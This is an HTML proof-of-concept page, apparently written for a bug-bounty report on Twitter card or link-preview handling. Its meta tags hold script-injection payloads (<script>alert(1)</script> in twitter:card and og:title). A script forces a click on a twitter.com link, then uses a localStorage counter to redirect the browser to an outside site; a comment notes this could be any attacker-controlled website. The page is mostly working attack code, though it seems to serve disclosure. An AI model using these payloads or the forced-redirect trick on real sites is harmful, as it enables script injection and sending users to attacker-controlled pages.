
<html>
   <head>

      <script>alert(1)</script>
      <meta name="twitter:card" content="summary<script>alert(1)</script>"></meta>
   <meta name="twitter:site" content="@nytimesbits" />
<meta name="twitter:creator" content="@nickbilton" />
   <meta property="og:url" content="https://twitter.com/jayesh189921691/status/1255755887408381952" />
<meta property="og:title" content="A Twitter for My Sister<script>alert(1)</script>" />
  </head>
<body>
<a href="https://twitter.com/i/flow" id="forceClick" onClick="forceClicked()" target="_self" >Click Me</a> 
   
</body>
<script>

function forceClicked(){
localStorage.setItem("ClickCount", 1);  //Setting up a value in local storage to detected user click
}



if(localStorage.getItem("ClickCount")==1)
   {
      localStorage.setItem("ClickCount", 0); 
      if(localStorage.getItem("ClickCount")==0) 
         {
            window.location.replace("https://hackerone.com/twitter");  //This can any attacker controlled website
         }

   }
else {

document.getElementById("forceClick").click();

}


</script>
</html>
